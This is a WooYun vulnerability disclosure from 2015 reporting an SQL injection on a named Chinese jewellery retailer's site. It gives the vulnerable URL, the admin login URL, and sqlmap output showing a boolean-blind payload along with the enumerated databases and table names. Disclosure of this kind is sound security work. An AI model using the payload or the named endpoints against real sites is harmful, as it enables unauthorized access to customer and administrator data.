当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-094297

漏洞标题:某知名珠宝商城存在sql注入(可脱裤)

相关厂商:某知名珠宝

漏洞作者: 黄泉哥

提交时间:2015-01-28 15:13

修复时间:2015-03-14 15:14

公开时间:2015-03-14 15:14

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-14: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

国内某知名珠宝网站存在sql注入漏洞,可脱裤,导致信息泄露

详细说明:

http://www.dionly.com/jiamengdian/agent.aspx?id=1 漏点
http://ht.dionly.com/Join/login.asp 后台

漏洞证明:

web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9456=9456
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [11]:
[*] Dionly_CMS
[*] Dionly_CMS_CX
[*] Dionly_PAD
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] risun_DB_432
[*] tempdb
[*] YDX
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 9456=9456
---
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: Dionly_PAD
[45 tables]
+-------------------------+
| Address |
| Admin |
| Admin_Grant |
| Admin_IPRange |
| Admin_Log |
| Agent |
| Agent_Staff |
| Baike |
| Baike_Class |
| Base_Area |
| Base_BankAccount |
| Base_ColorJewel |
| Base_Gold |
| Base_IP |
| Base_Module |
| Base_Pearl |
| Base_Product_CustomType |
| Base_RingSizeRate |
| Base_TinyDiamond |
| Cart |
| Certify |
| Data |
| Diamond |
| Diamond_Temp |
| Diamond_W1 |
| Diamond_WG |
| Document |
| Favorite |
| Flow |
| GoToShop |
| Message |
| MobileProduct |
| News |
| News_Class |
| Order |
| Order_Diamond |
| Order_Fee |
| Order_Memo |
| Order_Product |
| Order_State |
| Parameter |
| Product |
| Recommend |
| User |
| User_ValidCode |
+-------------------------+
未脱裤,物管费已交..

修复方案:

你们比我懂..

版权声明:转载请注明来源 黄泉哥@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2015-01-28 15:39 | 0x 80 ( 普通白帽子 | Rank:1301 漏洞数:398 | 某安全公司招聘系统运维、渗透测试、安全运...)

    是不是啊